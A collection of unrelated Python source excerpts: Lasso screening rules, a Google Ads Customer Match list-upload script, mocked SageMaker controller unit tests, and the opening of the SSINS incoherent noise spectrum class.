max_constr = 10
def __init__(self, max_constr=10, tol=1e-9):
AbstractScreeningRule.__init__(self, 'DualLasso({0})'.format(max_constr), tol=tol)
self.max_constr = max_constr
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
raise NotImplementedError('HSConstr only returns halfspace constraints.')
def get_local_halfspaces(self, o, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
if not self.isFirstIter(l0, lmax):
ak = np.concatenate((X[nz,:], -X[nz,:]))
bk = np.ones(2*nz.size)
normak = np.linalg.norm(ak, axis=1)
# find the 'max_constr' ak with the lowest value
inds = np.argsort(normak[:len(nz)])
inds = inds[:np.min([inds.size, self.max_constr])]
inds = np.concatenate((inds, inds+len(nz)))
ak = ak[inds,:]
bk = bk[inds]
normak = normak[inds]
else:
ak = np.array([lmax_x, -lmax_x])
bk = np.ones(2)
normak = np.linalg.norm(ak, axis=1)
return (ak, bk, normak)
class IDPP(DPP):
""" Interval Screening by Dual Polytope Projection """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'IDPP', tol)
def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# [i]nterval [d]ual [p]olytope [p]rojection
# old dual solution
theta = (y - X[nz,:].T.dot(beta[nz])) / l0
# screen only active features
minds = np.where(intervals >= l)[0]
lhs = np.abs(X[minds,:].dot(theta))
mul = self.normX[minds] * normy
xminl = mul / (1.0 + mul / l0 - lhs - self.tol)
# update intervals of active features
nintervals = np.array(intervals)
nintervals[minds] = xminl
# find violators within the active set
inds = minds[np.where(xminl >= l)[0]]
return (inds, nintervals)
class EDPP(AbstractSphereScreeningRule):
""" Enhanced Screening by Dual Polytope Projection """
def __init__(self, tol=1e-9):
AbstractScreeningRule.__init__(self, 'EDPP', tol)
#def screen(self, l, l0, lmax, lmax_x, beta, X, y, normX, normy, nz, intervals):
# # [e]nhanced [d]ual [p]olytope [p]rojection
# # old dual solution
# theta = (y - X[nz,:].T.dot(beta[nz])) / l0
# v1 = y / l0 - theta
# if abs(lmax-l0) < self.tol:
# v1 = lmax_x * np.sign(lmax_x.T.dot(y))
# v2 = y/l - theta
# v2t = v2 - v1 * v1.T.dot(v2) / v1.T.dot(v1)
# lhs = np.abs(X.dot(theta + 0.5*v2t))
# rhs = 1.0 - 0.5*normX*np.linalg.norm(v2t)
# inds = np.where(lhs >= rhs - self.tol)[0]
# return (inds, intervals)
def get_sphere(self, l, l0, lmax, lmax_x, beta, X, y, | |
<gh_stars>10-100
#!/usr/bin/env python
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Adds user lists and populates them with customer's CRM contact information.
Note: It may take several hours for the list to be populated with members. Email
addresses must be associated with a Google account. For privacy purposes, the
user list size will show as zero until the list has at least 1000 members. After
that, the size will be rounded to the two most significant digits.
"""
import argparse
import csv
import hashlib
from google.ads.googleads.client import GoogleAdsClient
from google.ads.googleads.errors import GoogleAdsException
# CSV Headers (Change if needed)
HEADER_LINE = True
EMAIL = 'Email'
PHONE = 'Phone'
MOBILE_ID = 'MobileId'
USER_ID = 'UserId'
FIRST_NAME = 'FirstName'
LAST_NAME = 'LastName'
COUNTRY_CODE = 'CountryCode'
ZIP_CODE = 'ZipCode'
LIST_NAME = 'List'
# Default Values
GENERIC_LIST = 'Generic List from the API'
CSV_FILE_PATH = 'audience.csv'
CONFIG_PATH = './googleads_config.yaml'
MEMBERSHIP_LIFESPAN_DAYS = 8
# Constants
CONTACT_INFO = 'CONTACT_INFO'
MOBILE_ADVERTISING_ID = 'MOBILE_ADVERTISING_ID'
CRM_ID = 'CRM_ID'
def generate_list_data_base(list_type):
"""Generates an empty customer list data object.
Args:
list_type: The type of customer list (based on CustomerMatchUploadKeyType).
Returns:
data_base: an empty customer list data object.
"""
data_base = {}
if list_type == CONTACT_INFO:
data_base['emails'] = []
data_base['phones'] = []
data_base['addresses'] = []
elif list_type == MOBILE_ADVERTISING_ID:
data_base['mobile_ids'] = []
elif list_type == CRM_ID:
data_base['user_ids'] = []
return data_base
def is_list_empty(customer_data):
if customer_data:
for item in customer_data:
if customer_data[item]:
return False
return True
def read_csv(path, list_type, hash_required):
"""Reads customer data from CSV and stores it in memory.
Args:
path: CSV file path.
list_type: The type of customer list (based on CustomerMatchUploadKeyType).
hash_required: Indicates if the customer data needs to be hashed.
Returns:
customer_data: Processed data from CSV.
"""
with open(path, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
line_count = 0
customer_data = {}
for row in csv_reader:
if HEADER_LINE and line_count == 0:
# Skip Header Line
line_count += 1
next # pylint: disable=pointless-statement
if row.get(LIST_NAME):
if not customer_data.get(row[LIST_NAME]):
customer_data[row[LIST_NAME]] = generate_list_data_base(list_type)
list_data = customer_data[row[LIST_NAME]]
else:
# Use generic list
if not customer_data.get(GENERIC_LIST):
customer_data[GENERIC_LIST] = generate_list_data_base(list_type)
list_data = customer_data[GENERIC_LIST]
if list_type == CONTACT_INFO:
if row.get(EMAIL):
if hash_required:
list_data['emails'].append(
{'hashed_email': normalize_and_sha256(row[EMAIL])})
else:
list_data['emails'].append({'hashed_email': row[EMAIL]})
if row.get(PHONE):
if hash_required:
list_data['phones'].append(
{'hashed_phone_number': normalize_and_sha256(row[PHONE])})
else:
list_data['phones'].append({'hashed_phone_number': row[PHONE]})
if (row.get(FIRST_NAME) and row.get(LAST_NAME) and
row.get(COUNTRY_CODE) and row.get(ZIP_CODE)):
address = {}
if hash_required:
address['hashed_first_name'] = normalize_and_sha256(row[FIRST_NAME])
address['hashed_last_name'] = normalize_and_sha256(row[LAST_NAME])
else:
address['hashed_first_name'] = row[FIRST_NAME]
address['hashed_last_name'] = row[LAST_NAME]
address['country_code'] = row[COUNTRY_CODE]
address['zip_code'] = row[ZIP_CODE]
list_data['addresses'].append(address)
elif list_type == MOBILE_ADVERTISING_ID:
if row.get(MOBILE_ID):
list_data['mobile_ids'].append({'mobile_id': row[MOBILE_ID]})
elif list_type == CRM_ID:
if row.get(USER_ID):
list_data['user_ids'].append({'third_party_user_id': row[USER_ID]})
line_count += 1
print(f'Processed {line_count} lines from file {path}.')
return customer_data
def get_user_list_resource_name(client, customer_id, list_name):
"""Gets the User List using the name provided.
Args:
client: The Google Ads client instance.
customer_id: The customer ID for which to add the user list.
list_name: The name of the user list to search.
Returns:
The User List resource name.
"""
googleads_service_client = client.get_service('GoogleAdsService')
query = f'''
SELECT
user_list.id,
user_list.name
FROM user_list
WHERE user_list.name = '{list_name}'
'''
search_results = googleads_service_client.search(
customer_id=customer_id, query=query)
user_list_resource_name = None
for result in search_results:
user_list_resource_name = result.user_list.resource_name
return user_list_resource_name
def create_user_list(client, customer_id, list_name, list_type, app_id=None):
"""Creates a User List using the name provided.
Args:
client: The Google Ads client instance.
customer_id: The customer ID for which to add the user list.
list_name: The name of the user list to search.
list_type: The type of customer list (based on CustomerMatchUploadKeyType).
app_id: App ID required only for mobile advertising lists.
Returns:
The User List resource name.
"""
print(f'The user list {list_name} will be created.')
user_list_service_client = client.get_service('UserListService')
user_list_operation = client.get_type('UserListOperation')
# Creates the new user list.
user_list = user_list_operation.create
user_list.name = list_name
user_list.description = ('This is a list of users uploaded using Ads API.')
user_list.crm_based_user_list.upload_key_type = (list_type)
if list_type == MOBILE_ADVERTISING_ID:
user_list.crm_based_user_list.app_id = app_id
user_list.membership_life_span = MEMBERSHIP_LIFESPAN_DAYS
response = user_list_service_client.mutate_user_lists(
customer_id=customer_id, operations=[user_list_operation])
user_list_resource_name = response.results[0].resource_name
print(
f'User list with resource name "{user_list_resource_name}" was created.')
return user_list_resource_name
def add_users_to_customer_match_user_list(client, customer_id,
user_list_resource_name,
customer_data, skip_polling):
"""Uses Customer Match to create and add users to a new user list.
Args:
client: The Google Ads client.
customer_id: The customer ID for which to add the user list.
user_list_resource_name: The resource name of the user list to which to
add users.
customer_data: Processed customer data to be uploaded.
skip_polling: A bool dictating whether to poll the API for completion.
"""
offline_user_data_job_service_client = client.get_service(
'OfflineUserDataJobService')
offline_user_data_job = client.get_type('OfflineUserDataJob')
offline_user_data_job.type_ = client.get_type(
'OfflineUserDataJobTypeEnum'
).OfflineUserDataJobType.CUSTOMER_MATCH_USER_LIST
offline_user_data_job.customer_match_user_list_metadata.user_list = (
user_list_resource_name)
# Issues a request to create an offline user data job.
create_offline_user_data_job_response = (
offline_user_data_job_service_client.create_offline_user_data_job(
customer_id=customer_id, job=offline_user_data_job))
offline_user_data_job_resource_name = (
create_offline_user_data_job_response.resource_name)
print('Created an offline user data job with resource name: '
f'"{offline_user_data_job_resource_name}".')
request = client.get_type('AddOfflineUserDataJobOperationsRequest')
request.resource_name = offline_user_data_job_resource_name
request.operations = build_offline_user_data_job_operations(
client, customer_data)
request.enable_partial_failure = True
# Issues a request to add the operations to the offline user data job.
response = offline_user_data_job_service_client.add_offline_user_data_job_operations(
request=request)
# Prints the status message if any partial failure error is returned.
# Note: the details of each partial failure error are not printed here.
# Refer to the error_handling/handle_partial_failure.py example to learn
# more.
# Extracts the partial failure from the response status.
partial_failure = getattr(response, 'partial_failure_error', None)
if getattr(partial_failure, 'code', None) != 0:
error_details = getattr(partial_failure, 'details', [])
for error_detail in error_details:
failure_message = client.get_type('GoogleAdsFailure')
# Retrieve the class definition of the GoogleAdsFailure instance
# in order to use the "deserialize" class method to parse the
# error_detail string into a protobuf message object.
failure_object = type(failure_message).deserialize(error_detail.value)
for error in failure_object.errors:
print('A partial failure at index '
f'{error.location.field_path_elements[0].index} occurred.\n'
f'Error message: {error.message}\n'
f'Error code: {error.error_code}')
print('The operations are added to the offline user data job.')
# Issues a request to run the offline user data job for executing all
# added operations.
operation_response = (
offline_user_data_job_service_client.run_offline_user_data_job(
resource_name=offline_user_data_job_resource_name))
if skip_polling:
check_job_status(
client,
customer_id,
offline_user_data_job_resource_name,
user_list_resource_name,
)
else:
# Wait until the operation has finished.
print('Request to execute the added operations started.')
print('Waiting until operation completes...')
operation_response.result()
print_customer_match_user_list_info(client, customer_id,
user_list_resource_name)
def build_offline_user_data_job_operations(client, customer_data):
"""Builds the schema of user data as defined in the API.
Args:
client: The Google Ads client.
customer_data: Processed customer data to be uploaded.
Returns:
A list containing the operations.
"""
customer_data_operations = []
for data_type in customer_data:
for item in customer_data[data_type]:
# Creates a first user data based on an email address.
user_data_operation = client.get_type('OfflineUserDataJobOperation')
user_data = user_data_operation.create
user_identifier = client.get_type('UserIdentifier')
if data_type == 'emails':
user_identifier.hashed_email = item['hashed_email']
elif data_type == 'phones':
user_identifier.hashed_phone_number = item['hashed_phone_number']
elif data_type == 'mobile_ids':
user_identifier.mobile_id = item['mobile_id']
elif data_type == 'user_ids':
user_identifier.third_party_user_id = item['third_party_user_id']
elif data_type == 'addresses':
user_identifier.address_info.hashed_first_name = item[
'hashed_first_name']
user_identifier.address_info.hashed_last_name = item['hashed_last_name']
user_identifier.address_info.country_code = item['country_code']
user_identifier.address_info.postal_code = item['postal_code']
user_data.user_identifiers.append(user_identifier)
customer_data_operations.append(user_data_operation)
return customer_data_operations
def check_job_status(
client,
customer_id,
offline_user_data_job_resource_name,
user_list_resource_name,
):
"""Retrieves, checks, and prints the status of the offline user data job.
Args:
client: The Google Ads client.
customer_id: The customer ID for which to add the user list.
offline_user_data_job_resource_name: The resource name of the offline
user data job to get the status of.
user_list_resource_name: The resource name of the customer match user
list
"""
query = f'''
SELECT
offline_user_data_job.resource_name,
offline_user_data_job.id,
offline_user_data_job.status,
offline_user_data_job.type,
offline_user_data_job.failure_reason
FROM offline_user_data_job
WHERE offline_user_data_job.resource_name =
'{offline_user_data_job_resource_name}'
LIMIT 1'''
# Issues a search request using streaming.
google_ads_service = client.get_service('GoogleAdsService')
results = google_ads_service.search(customer_id=customer_id, query=query)
offline_user_data_job = next(iter(results)).offline_user_data_job
status_name = offline_user_data_job.status.name
print(f'Offline user data job ID \'{offline_user_data_job.id}\' with type '
f'\'{offline_user_data_job.type_.name}\' has status: {status_name}')
if status_name == 'SUCCESS':
print_customer_match_user_list_info(client, customer_id,
user_list_resource_name)
elif status_name == 'FAILED':
print(f'\tFailure Reason: {offline_user_data_job.failure_reason}')
elif status_name in ('PENDING', 'RUNNING'):
print('To check the status of the job periodically, use the following '
f'GAQL query with GoogleAdsService.Search: {query}')
print('Or you can use the check_job.py script with the following args:')
print(f'\npython check_job.py --config_file {args.config_file} '
f'--customer_id {customer_id} '
f'--job_resource_name {offline_user_data_job_resource_name} '
| |
<reponame>IBM/open-prediction-service-hub<gh_stars>1-10
#!/usr/bin/env python3
#
# Copyright 2020 IBM
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.IBM Confidential
#
# coding: utf-8
from __future__ import absolute_import
import unittest
from datetime import datetime
from unittest import mock
import botocore
from swagger_server.controllers.discover_controller import list_endpoints, list_models, get_endpoint_by_id, get_model_by_id
from swagger_server.models.error import Error # noqa: E501
from swagger_server.models.endpoints import Endpoints
from swagger_server.models.endpoint import Endpoint
from swagger_server.models.models import Models
from swagger_server.models.model import Model
from swagger_server.test import BaseTestCase
class TestDiscoverController(BaseTestCase, unittest.TestCase):
"""DiscoverController integration test stubs"""
# GET ENDPOINT BY ID
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_endpoint_by_id(self, mock_boto_client, mock_list_endpoints):
"""Test case for get_endpoint_by_id
Get an Endpoint
"""
endpoint_id = 'FakeEndpointId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.describe_endpoint.return_value = {
'EndpointName': 'string',
'EndpointArn': 'string',
'EndpointConfigName': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'DeployedImages': [
{
'SpecifiedImage': 'string',
'ResolvedImage': 'string',
'ResolutionTime': datetime(2015, 1, 1)
},
],
'CurrentWeight': ...,
'DesiredWeight': ...,
'CurrentInstanceCount': 123,
'DesiredInstanceCount': 123
},
],
'DataCaptureConfig': {
'EnableCapture': True | False,
'CaptureStatus': 'Started',
'CurrentSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string'
},
'EndpointStatus': 'InService',
'FailureReason': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1)
}
mock_list_endpoints.return_value.describe_endpoint_config.return_value = {
'EndpointConfigName': 'string',
'EndpointConfigArn': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'ModelName': 'string',
'InitialInstanceCount': 123,
'InstanceType': 'ml.t2.medium',
'InitialVariantWeight': ...,
'AcceleratorType': 'ml.eia1.medium',
}
],
'DataCaptureConfig': {
'EnableCapture': True,
'InitialSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string',
'CaptureOptions': [
{
'CaptureMode': 'Input'
},
],
'CaptureContentTypeHeader': {
'CsvContentTypes': [
'string',
],
'JsonContentTypes': [
'string',
]
}
},
'KmsKeyId': 'string',
'CreationTime': datetime(2015, 1, 1)
}
expected = ("{'deployed_at': datetime.datetime(2015, 1, 1, 0, 0),\n" +
" 'id': 'FakeEndpointId',\n" +
" 'links': [{'href': 'http://localhost/endpoints/FakeEndpointId', 'rel': 'self'},\n" +
" {'href': 'http://localhost/models/string', 'rel': 'model'}],\n" +
" 'name': 'FakeEndpointId',\n" +
" 'status': 'in_service'}")
response = get_endpoint_by_id(endpoint_id)
assert isinstance(response, Endpoint)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_endpoint_by_id_client_error(self, mock_boto_client, mock_list_endpoints):
"""Test case for get_endpoint_by_id
Get an Endpoint
"""
endpoint_id = 'FakeEndpointId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.describe_endpoint.side_effect = botocore.exceptions.ClientError(
error_response={'Error': {'Code': 'ErrorCode'}},
operation_name='describe_endpoint'
)
expected = ("{'error': 'An error occurred (ErrorCode) when calling the describe_endpoint '\n" +
" 'operation: Unknown'}")
response = get_endpoint_by_id(endpoint_id)
assert isinstance(response, Error)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_endpoint_by_id_unknown_error(self, mock_boto_client, mock_list_endpoints):
"""Test case for get_endpoint_by_id
Get an Endpoint
"""
endpoint_id = 'FakeEndpointId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.describe_endpoint.side_effect = {
'error': 'error message'
}
expected = "{'error': \"<class 'TypeError'>\"}"
response = get_endpoint_by_id(endpoint_id)
assert isinstance(response, Error)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
# GET MODEL BY ID
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_model_by_id(self, mock_boto_client, mock_client):
"""Test case for get_model_by_id
Get a Model
"""
modelId = 'FakeModelId'
endpointId = 'FakeEndpointId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_client.return_value.describe_model.return_value = {
'ModelName': modelId,
'ModelArn': 'string',
'CreationTime': datetime(2015, 1, 1)
}
mock_client.return_value.list_endpoints.return_value = {
'Endpoints': [
{
'EndpointName': endpointId,
'EndpointArn': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1),
'EndpointStatus': 'InService'
}
],
'NextToken': 'string'
}
mock_client.return_value.describe_endpoint.return_value = {
'EndpointName': endpointId,
'EndpointArn': 'string',
'EndpointConfigName': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'DeployedImages': [
{
'SpecifiedImage': 'string',
'ResolvedImage': 'string',
'ResolutionTime': datetime(2015, 1, 1)
},
],
'CurrentWeight': ...,
'DesiredWeight': ...,
'CurrentInstanceCount': 123,
'DesiredInstanceCount': 123
},
],
'DataCaptureConfig': {
'EnableCapture': True | False,
'CaptureStatus': 'Started',
'CurrentSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string'
},
'EndpointStatus': 'InService',
'FailureReason': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1)
}
mock_client.return_value.describe_endpoint_config.return_value = {
'EndpointConfigName': 'string',
'EndpointConfigArn': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'ModelName': modelId,
'InitialInstanceCount': 123,
'InstanceType': 'ml.t2.medium',
'InitialVariantWeight': ...,
'AcceleratorType': 'ml.eia1.medium',
}
],
'DataCaptureConfig': {
'EnableCapture': True,
'InitialSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string',
'CaptureOptions': [
{
'CaptureMode': 'Input'
},
],
'CaptureContentTypeHeader': {
'CsvContentTypes': [
'string',
],
'JsonContentTypes': [
'string',
]
}
},
'KmsKeyId': 'string',
'CreationTime': datetime(2015, 1, 1)
}
expected = ("{'created_at': datetime.datetime(2015, 1, 1, 0, 0),\n" +
" 'id': 'FakeModelId',\n" +
" 'input_schema': None,\n" +
" 'links': [{'href': 'http://localhost/models/FakeModelId', 'rel': 'self'},\n" +
" {'href': 'http://localhost/endpoints/FakeEndpointId',\n" +
" 'rel': 'endpoint'}],\n" +
" 'metadata': None,\n" +
" 'modified_at': None,\n" +
" 'name': 'FakeModelId',\n" +
" 'output_schema': None,\n" +
" 'version': None}")
response = get_model_by_id(modelId)
assert isinstance(response, Model)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_client.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_model_by_id_client_error(self, mock_boto_client, mock_list_models):
"""Test case for get_model_by_id
Get a Model
"""
modelId = 'FakeModelId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_models.return_value.describe_model.side_effect = botocore.exceptions.ClientError(
error_response={'Error': {'Code': 'ErrorCode'}},
operation_name='describe_model'
)
expected = ("{'error': 'An error occurred (ErrorCode) when calling the describe_model '\n" +
" 'operation: Unknown'}")
response = get_model_by_id(modelId)
assert isinstance(response, Error)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_models.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_get_model_by_id_unknown_error(self, mock_boto_client, mock_list_models):
"""Test case for get_model_by_id
Get a Model
"""
modelId = 'FakeModelId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_models.return_value.describe_model.side_effect = {
'error': 'error message'
}
expected = "{'error': \"<class 'TypeError'>\"}"
response = get_model_by_id(modelId)
assert isinstance(response, Error)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_models.assert_called_once()
# LIST ENDPOINTS
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_list_endpoints(self, mock_boto_client, mock_list_endpoints):
"""Test case for list_endpoints
List Endpoints
"""
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.list_endpoints.return_value = {
'Endpoints': [
{
'EndpointName': 'string',
'EndpointArn': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1),
'EndpointStatus': 'InService'
},
],
'NextToken': 'string'
}
mock_list_endpoints.return_value.describe_endpoint.return_value = {
'EndpointName': 'string',
'EndpointArn': 'string',
'EndpointConfigName': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'DeployedImages': [
{
'SpecifiedImage': 'string',
'ResolvedImage': 'string',
'ResolutionTime': datetime(2015, 1, 1)
},
],
'CurrentWeight': ...,
'DesiredWeight': ...,
'CurrentInstanceCount': 123,
'DesiredInstanceCount': 123
},
],
'DataCaptureConfig': {
'EnableCapture': True | False,
'CaptureStatus': 'Started',
'CurrentSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string'
},
'EndpointStatus': 'InService',
'FailureReason': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1)
}
mock_list_endpoints.return_value.describe_endpoint_config.return_value = {
'EndpointConfigName': 'string',
'EndpointConfigArn': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'ModelName': 'string',
'InitialInstanceCount': 123,
'InstanceType': 'ml.t2.medium',
'InitialVariantWeight': ...,
'AcceleratorType': 'ml.eia1.medium',
}
],
'DataCaptureConfig': {
'EnableCapture': True,
'InitialSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string',
'CaptureOptions': [
{
'CaptureMode': 'Input'
},
],
'CaptureContentTypeHeader': {
'CsvContentTypes': [
'string',
],
'JsonContentTypes': [
'string',
]
}
},
'KmsKeyId': 'string',
'CreationTime': datetime(2015, 1, 1)
}
expected = ("{'endpoints': [{'deployed_at': datetime.datetime(2015, 1, 1, 0, 0),\n" +
" 'id': 'string',\n" +
" 'links': [{'href': 'http://localhost/endpoints/string',\n" +
" 'rel': 'self'},\n" +
" {'href': 'http://localhost/models/string',\n" +
" 'rel': 'model'}],\n" +
" 'name': 'string',\n" +
" 'status': 'in_service'}]}")
response = list_endpoints()
assert isinstance(response, Endpoints)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_list_endpoints_with_model_id(self, mock_boto_client, mock_list_endpoints):
"""Test case for list_endpoints
List Endpoints
"""
modelId = 'FakeModelId'
mock_boto_client.return_value = botocore.client.BaseClient()
mock_list_endpoints.return_value.list_endpoints.return_value = {
'Endpoints': [
{
'EndpointName': 'string',
'EndpointArn': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1),
'EndpointStatus': 'InService'
},
],
'NextToken': 'string'
}
mock_list_endpoints.return_value.describe_endpoint.return_value = {
'EndpointName': 'string',
'EndpointArn': 'string',
'EndpointConfigName': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'DeployedImages': [
{
'SpecifiedImage': 'string',
'ResolvedImage': 'string',
'ResolutionTime': datetime(2015, 1, 1)
},
],
'CurrentWeight': ...,
'DesiredWeight': ...,
'CurrentInstanceCount': 123,
'DesiredInstanceCount': 123
},
],
'DataCaptureConfig': {
'EnableCapture': True | False,
'CaptureStatus': 'Started',
'CurrentSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string'
},
'EndpointStatus': 'InService',
'FailureReason': 'string',
'CreationTime': datetime(2015, 1, 1),
'LastModifiedTime': datetime(2015, 1, 1)
}
mock_list_endpoints.return_value.describe_endpoint_config.return_value = {
'EndpointConfigName': 'string',
'EndpointConfigArn': 'string',
'ProductionVariants': [
{
'VariantName': 'string',
'ModelName': modelId,
'InitialInstanceCount': 123,
'InstanceType': 'ml.t2.medium',
'InitialVariantWeight': ...,
'AcceleratorType': 'ml.eia1.medium',
}
],
'DataCaptureConfig': {
'EnableCapture': True,
'InitialSamplingPercentage': 123,
'DestinationS3Uri': 'string',
'KmsKeyId': 'string',
'CaptureOptions': [
{
'CaptureMode': 'Input'
},
],
'CaptureContentTypeHeader': {
'CsvContentTypes': [
'string',
],
'JsonContentTypes': [
'string',
]
}
},
'KmsKeyId': 'string',
'CreationTime': datetime(2015, 1, 1)
}
expected = ("{'endpoints': [{'deployed_at': datetime.datetime(2015, 1, 1, 0, 0),\n" +
" 'id': 'string',\n" +
" 'links': [{'href': 'http://localhost/endpoints/string',\n" +
" 'rel': 'self'},\n" +
" {'href': 'http://localhost/models/FakeModelId',\n" +
" 'rel': 'model'}],\n" +
" 'name': 'string',\n" +
" 'status': 'in_service'}]}")
response = list_endpoints(modelId)
assert isinstance(response, Endpoints)
assert str(response) == expected, 'response is not matching expected response'
mock_boto_client.assert_called_once_with('sagemaker')
mock_list_endpoints.assert_called_once()
@mock.patch("swagger_server.controllers.discover_controller.botocore.client.BaseClient")
@mock.patch("swagger_server.controllers.discover_controller.boto3.client")
def test_list_endpoints_not_existing_model_id(self, mock_boto_client, mock_list_endpoints):
"""Test case for list_endpoints
List Endpoints
"""
modelId = 'FakeModelId'
| |
<filename>SSINS/incoherent_noise_spectrum.py<gh_stars>1-10
"""
The incoherent noise spectrum class.
"""
import numpy as np
import os
from pyuvdata import UVFlag
import yaml
from functools import reduce
import warnings
from itertools import combinations
from SSINS.match_filter import Event
class INS(UVFlag):
"""
Defines the incoherent noise spectrum (INS) class, which is a subclass of
the UVFlag class, a member of the pyuvdata software package.
"""
def __init__(self, input, history='', label='', order=0, mask_file=None,
match_events_file=None, spectrum_type="cross",
use_integration_weights=False, nsample_default=1):
"""
init function for the INS class.
Args:
input: See UVFlag documentation
history: See UVFlag documentation
label: See UVFlag documentation
order: Sets the order parameter for the INS object
mask_file: A path to an .h5 (UVFlag) file that contains a mask for the metric_array
match_events_file: A path to a .yml file that has events caught by the match filter
spectrum_type: Type of visibilities to use in making the specturm. Options are 'auto' or 'cross'.
use_integration_weights: Whether to use the integration time and nsample array to compute the weights
nsample_default: The default nsample value to fill zeros in the
nsample_array with when there are some nsample=0. Important when
working with data from uvfits files, which combine information
from the flag_array and nsample_array in the weights field of
the uvfits file.
"""
super().__init__(input, mode='metric', copy_flags=False,
waterfall=False, history='', label='')
# Used in _data_params to determine when not to return None
self._super_complete = True
if np.any(self.polarization_array > 0):
raise ValueError("SS input has pseudo-Stokes data. SSINS does not"
" currently support pseudo-Stokes spectra.")
self.spectrum_type = spectrum_type
"""The type of visibilities the spectrum was made from."""
if self.spectrum_type not in ['cross', 'auto']:
raise ValueError("Requested spectrum_type is invalid. Choose 'cross' or 'auto'.")
spec_type_str = f"Initialized spectrum_type:{self.spectrum_type} from visibility data. "
self.order = order
"""The order of polynomial fit for each frequency channel during mean-subtraction. Default is 0, which just calculates the mean."""
if self.type == 'baseline':
self.history += spec_type_str
# Check if the data has a mask yet. If not, mask it and set flag_choice to None.
if not isinstance(input.data_array, np.ma.MaskedArray):
input.apply_flags()
self.metric_array = np.abs(input.data_array)
"""The baseline-averaged sky-subtracted visibility amplitudes (numpy masked array)"""
self.weights_array = np.logical_not(input.data_array.mask).astype(float)
"""The number of baselines that contributed to each element of the metric_array"""
if use_integration_weights:
# Set nsample default if some are zero
input.nsample_array[input.nsample_array == 0] = nsample_default
